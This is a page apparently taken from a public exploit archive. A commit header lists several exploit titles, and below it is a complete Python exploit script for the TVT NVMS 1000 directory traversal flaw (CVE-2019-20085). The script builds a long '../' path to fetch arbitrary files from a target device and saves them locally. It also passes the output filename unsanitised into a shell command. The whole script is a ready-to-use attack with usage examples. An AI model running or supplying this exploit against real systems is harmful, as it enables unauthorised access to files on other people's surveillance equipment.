be2aa5d840
7 changes to exploits/shellcodes Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) Huawei HG630 2 Router - Authentication Bypass TVT NVMS 1000 - Directory Traversal Webtateas 2.0 - Arbitrary File Read WSO2 3.1.0 - Arbitrary File Delete Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection
43 lines
No EOL
1.1 KiB
Python
Executable file
43 lines
No EOL
1.1 KiB
Python
Executable file
# Exploit Title: TVT NVMS 1000 - Directory Traversal
|
|
# Date: 2020-04-13
|
|
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
|
|
# Vendor Homepage: http://en.tvt.net.cn/
|
|
# Version : N/A
|
|
# Software Link : http://en.tvt.net.cn/products/188.html
|
|
# Original Author : Numan Türle
|
|
# CVE : CVE-2019-20085
|
|
|
|
import sys
|
|
import requests
|
|
import os
|
|
import time
|
|
|
|
if len(sys.argv) !=4:
|
|
print " "
|
|
print "Usage : python exploit.py url filename outputname"
|
|
print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
|
|
print " "
|
|
else:
|
|
|
|
|
|
traversal = "../../../../../../../../../../../../../"
|
|
filename = sys.argv[2]
|
|
url = sys.argv[1]+traversal+filename
|
|
outputname = sys.argv[3]
|
|
content = requests.get(url)
|
|
|
|
if content.status_code == 200:
|
|
|
|
print " "
|
|
print "Directory Traversal Succeeded"
|
|
time.sleep(3)
|
|
print " "
|
|
print "Saving Output"
|
|
os.system("touch " + outputname)
|
|
output_write = open(outputname,"r+")
|
|
output_write.write(content.text)
|
|
output_write.close()
|
|
|
|
else:
|
|
|
|
print "Host not vulnerable to Directory Traversal!" |